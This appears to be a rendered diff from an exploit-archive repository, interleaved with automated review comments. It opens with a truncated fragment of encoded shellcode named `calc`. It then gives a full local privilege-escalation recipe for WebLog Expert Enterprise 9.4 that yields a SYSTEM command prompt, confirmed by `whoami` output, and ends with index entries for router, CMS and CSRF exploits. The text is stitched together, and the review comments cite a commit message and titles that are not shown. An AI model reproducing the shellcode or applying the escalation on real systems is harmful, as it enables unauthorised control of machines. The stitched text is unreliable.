calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
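Review bot: the hunk header says one line was removed (-16,7 +16,6), but the rendering shows only the six surviving context lines, so the deletion itself is not reviewable here. Of what is visible, the comment `# Create an array of buffers, from 1 to 5900, with increments of 200.` sits directly above the `calc = (...)` definition and describes neither it nor anything that follows; it is a leftover from a fuzzing stage and should be replaced with a comment that states what `calc` holds.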

@ -0,0 +1,49 @@
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation
Date: 03-31-2018
Vulnerable Software: WebLog Expert Enterprise 9.4
Vendor Homepage: https://www.weblogexpert.com/
Version: 9.4
Software Link: https://www.weblogexpert.com/download.htm
Tested On: Windows 7 x86 and x64
Details:
By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account.
If WebLog Expert Schedule Service is installed by an administrator, regular users have the
ability to run tasks as Local System.
Exploit:
1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed
2. Open WebLog Expert and then Schedule
3. Select Add, Next, choose 'Sample - HTML' under Profile, Next
4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below
Command: C:\Windows\System32\cmd.exe
Run in: C:\Windows\System32\
5. Select Next, Finish, Highlight New Task, select Run Now
6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message'
7. Select 'View the message'
8. Command prompt is shown
C:\Windows\system32>whoami
nt authority\system
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running WebLog Expert and WebLog Expert Schedule Service using a
low-privileged user account
Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.
Fix:
Under Schedule Options, change default account that runs scheduled tasks
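Review bot: the Fix section ("change default account that runs scheduled tasks") does not say what to change it to; state that the Schedule Service should run under a dedicated low-privilege account, and that the 'Run command...' option, which lets anyone who can reach the Schedule dialog pick an arbitrary Command and Run in directory (step 4), should be limited to administrators. The Details paragraph conditions the issue on the service having been installed by an administrator; the Prerequisites section should repeat that so the two sections agree. "aka Game Over" in the Risk section is informal for an advisory.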

@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port
44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port
44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44379,exploits/php/webapps/44379.rb,"Vtiger CRM 6.3.0 - Authenticated Arbitrary File Upload (Metasploit)",2018-03-30,"Touhid M.Shaikh",webapps,php,
44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router V5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
44380,exploits/asp/webapps/44380.txt,"Tenda W3002R/A302/w309r Wireless Router v5.07.64_en - Remote DNS Change (PoC)",2018-03-30,"Todor Donev",webapps,asp,
44383,exploits/php/webapps/44383.html,"Frog CMS 0.9.5 - Cross-Site Request Forgery (Add User)",2018-04-02,"Samrat Das",webapps,php,
44384,exploits/php/webapps/44384.txt,"WampServer 3.1.1 - Cross-Site Scripting / Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
44385,exploits/php/webapps/44385.html,"WampServer 3.1.2 - Cross-Site Request Forgery",2018-04-02,"Vipin Chaudhary",webapps,php,
44386,exploits/perl/webapps/44386.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Directory Traversal",2018-04-02,LiquidWorm,webapps,perl,
44387,exploits/hardware/webapps/44387.txt,"VideoFlow Digital Video Protection (DVP) 2.10 - Hard-Coded Credentials",2018-04-02,LiquidWorm,webapps,hardware,
44388,exploits/hardware/webapps/44388.txt,"DLink DIR-601 - Admin Password Disclosure",2018-04-02,"Kevin Randall",webapps,hardware,
44391,exploits/php/webapps/44391.html,"OpenCMS 10.5.3 - Cross-Site Request Forgery",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44392,exploits/php/webapps/44392.txt,"OpenCMS 10.5.3 - Cross-Site Scripting",2018-04-02,"Sureshbabu Narvaneni",webapps,php,
44393,exploits/hardware/webapps/44393.sh,"Secutech RiS-11/RiS-22/RiS-33 - Remote DNS Change",2018-04-02,"Todor Donev",webapps,hardware,
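Review bot: the -/+ markers were lost in rendering, so the 44381 and 44380 pairs look like duplicate ids; they are the removed and added lines for a single case change (V5.07 to v5.07) in each title, the same pair that appears in the commit message above. The added 44387 line labels the VideoFlow file "Hard-Coded Credentials" while that file's own title reads "Authenticated Root Remote Code Execution"; one of the two should be corrected so the CSV and the advisory agree.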